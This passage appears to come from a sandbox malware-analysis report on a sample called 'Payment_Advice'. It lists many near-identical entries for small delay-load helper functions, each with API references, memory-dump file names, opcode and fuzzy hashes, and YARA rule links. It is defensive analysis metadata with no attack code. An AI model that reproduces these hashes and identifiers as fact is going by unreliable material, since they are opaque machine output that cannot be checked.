                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 106a9d713bf8107917705d41b85fe8ea9bd8b79d3506d7442b4bae74fb845f77
                                                                                                    • Instruction ID: 15e5445bdef4ee6ccaf507b8539047ef5f28c45d1c2f82dde2537209bf1f8a69
                                                                                                    • Opcode Fuzzy Hash: 106a9d713bf8107917705d41b85fe8ea9bd8b79d3506d7442b4bae74fb845f77
                                                                                                    • Instruction Fuzzy Hash: 32B012E9298101BC320411555C1BCB70E0CF4C3B10330883EFC02D1480D850ACC24431
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E1F6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 04e63464eaaa8cdfc9d01c89bcbf70980aa760034b7f37734fb05e1012f09616
                                                                                                    • Instruction ID: 8daa2254adf76149d9c192c47454849d85b1eb6707959199616890475af757ca
                                                                                                    • Opcode Fuzzy Hash: 04e63464eaaa8cdfc9d01c89bcbf70980aa760034b7f37734fb05e1012f09616
                                                                                                    • Instruction Fuzzy Hash: 09B012E5298001BC320456155C0BCB70E4CF4C3B20330C43EFC06C2180D850AC864531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: f80a18457502063f42b77f2d56f6a25972a72ed62c74e713c30b6a1295484278
                                                                                                    • Instruction ID: 8cbf986a883c9bfcf152979e2d87b7db721a3308226d9a2af81acbc0185eec61
                                                                                                    • Opcode Fuzzy Hash: f80a18457502063f42b77f2d56f6a25972a72ed62c74e713c30b6a1295484278
                                                                                                    • Instruction Fuzzy Hash: 7CB012E929C101BC320451595C0BCB70E4CF4C3B10330443EFC06C2080D8506CC24631
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: a193eb47a7ae3694963026a27f0274dbca0abe15c0629129a454e86a643df6b0
                                                                                                    • Instruction ID: 8892a90449f267db854b1cd1461938bba9551f85f4a4e2652d47b0e131e32261
                                                                                                    • Opcode Fuzzy Hash: a193eb47a7ae3694963026a27f0274dbca0abe15c0629129a454e86a643df6b0
                                                                                                    • Instruction Fuzzy Hash: B5B012F5299141BD324452151C0BCB70E4DF5C2B10730453EFC06C2080D8506CC64531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: bf52ff5af2e1e4e8f0c76c592ddcb23da25fbeed8bf9f92a2daa1e8abfd7ab47
                                                                                                    • Instruction ID: 069f3a94607af7cf7d318ebcff4da1b9f59d4e73dcaddb6c1eefce3c42bc3742
                                                                                                    • Opcode Fuzzy Hash: bf52ff5af2e1e4e8f0c76c592ddcb23da25fbeed8bf9f92a2daa1e8abfd7ab47
                                                                                                    • Instruction Fuzzy Hash: 78B012E5699041BC320451151C0BCB70E4DF5C3B10730843EFC06C2080D850AC824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 007004ed81f21cffa4479609bddaac18d20f54f2f342da72821c9505d79104dc
                                                                                                    • Instruction ID: 5384dc4e83b6ca79663681a40d7a47e4d54341789618cb837353d868322e3fdd
                                                                                                    • Opcode Fuzzy Hash: 007004ed81f21cffa4479609bddaac18d20f54f2f342da72821c9505d79104dc
                                                                                                    • Instruction Fuzzy Hash: 4BB012E52A9041BC320451151C0BCB70E8DF9C2B10730443EFC07C2080D8506C824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: c066eb7889fec240e3ac14aa4ebc50b879d9dee224016beeb740c4c174e55071
                                                                                                    • Instruction ID: 4b01366ec7fcabff00d5ba7d3572063970f04a2d968a7294b921295ec7e00e2f
                                                                                                    • Opcode Fuzzy Hash: c066eb7889fec240e3ac14aa4ebc50b879d9dee224016beeb740c4c174e55071
                                                                                                    • Instruction Fuzzy Hash: 63B012E5298001BC321451251C0BCB70E8CF4C3B10330843EFC06C2080D950ECC24531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 427259fe91a4c9c60fab2db052b8c001c3e233e4d1416d6d6a67c39a7e0229e3
                                                                                                    • Instruction ID: 8de907c26ac8b8cd3961b9995a85c750140242e6ab897d68354d2460fcfcc438
                                                                                                    • Opcode Fuzzy Hash: 427259fe91a4c9c60fab2db052b8c001c3e233e4d1416d6d6a67c39a7e0229e3
                                                                                                    • Instruction Fuzzy Hash: B7B012F5298001BC320451151C0BCB70E4CF5C3F10330853EFC06C2081D850AD864531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: b2258002cb88684139129e2b49ae9511e91650985b6f4a4d989e2faaf2059796
                                                                                                    • Instruction ID: 3ba457f38096c8965024044465f7807e0b25adff22028d9dd54e1ca008e71090
                                                                                                    • Opcode Fuzzy Hash: b2258002cb88684139129e2b49ae9511e91650985b6f4a4d989e2faaf2059796
                                                                                                    • Instruction Fuzzy Hash: 13B012E53A8141BD324452155C0BCB70E4CF4C2B20330853EFC06C2180D8506CC64531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 8d0572a2d8c383412c70aacc194b8ae3d35ec7786a5d17096cccb95167c04ced
                                                                                                    • Instruction ID: 378ac677554efa7b5ff99d329538453ed0273d07b6af1ae583eb90d8de047065
                                                                                                    • Opcode Fuzzy Hash: 8d0572a2d8c383412c70aacc194b8ae3d35ec7786a5d17096cccb95167c04ced
                                                                                                    • Instruction Fuzzy Hash: 20B012E5298001BC320452155D0BCB70E4CF4C2B20330843EFC06C2180DC606D8B4531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: a7a0d5b60010daa07a571d8def9a1ebf5314ef011f9639b07b1adb166ddfe60c
                                                                                                    • Instruction ID: 4195fee43cd1a90adf2cb42233417f70261ff967645357455436c77136b43045
                                                                                                    • Opcode Fuzzy Hash: a7a0d5b60010daa07a571d8def9a1ebf5314ef011f9639b07b1adb166ddfe60c
                                                                                                    • Instruction Fuzzy Hash: 74B012F5298001BC320455151D0BCB70E4CF5C2F10330453EFC06C2081DC506E834531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 7d08450ebf8ec5292fe76ed7d99e509d95b927476b4b40e8a0095a8fb3eedba1
                                                                                                    • Instruction ID: ff1213c31391eccba8939b545da05287153470130d4ab4a3cd1a149b8a1621ac
                                                                                                    • Opcode Fuzzy Hash: 7d08450ebf8ec5292fe76ed7d99e509d95b927476b4b40e8a0095a8fb3eedba1
                                                                                                    • Instruction Fuzzy Hash: 04B012F5298001BC320451161C0BCB70E4CF5C2F10330453EFC06C2081D8506D824531
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549138883.0000000000533000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.000000000053E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000545000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549193714.0000000000562000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1549363309.0000000000563000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_500000_Payment_Advice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: Q
                                                                                                    • API String ID: 1269201914-2173417064
                                                                                                    • Opcode ID: 3342660e8071ad461734cbbf7ec9a63275a531bad1161d2f77a115abf2dd9ff0
                                                                                                    • Instruction ID: 7725d87622a404d86836628aef19e3c8dc856421bd0c6678397a178f7ccd7ab7
                                                                                                    • Opcode Fuzzy Hash: 3342660e8071ad461734cbbf7ec9a63275a531bad1161d2f77a115abf2dd9ff0
                                                                                                    • Instruction Fuzzy Hash: B7B012F5298101BD324451151C0BCB70E4CF5C2F10330463EFC06C2081D8506DC24571
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0051E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0051E1E3
                                                                                                      • Part of subcall function 0051E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0051E8D0
                                                                                                      • Part of subcall function 0051E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0051E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1549101071.0000000000501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00500000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1548984734.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
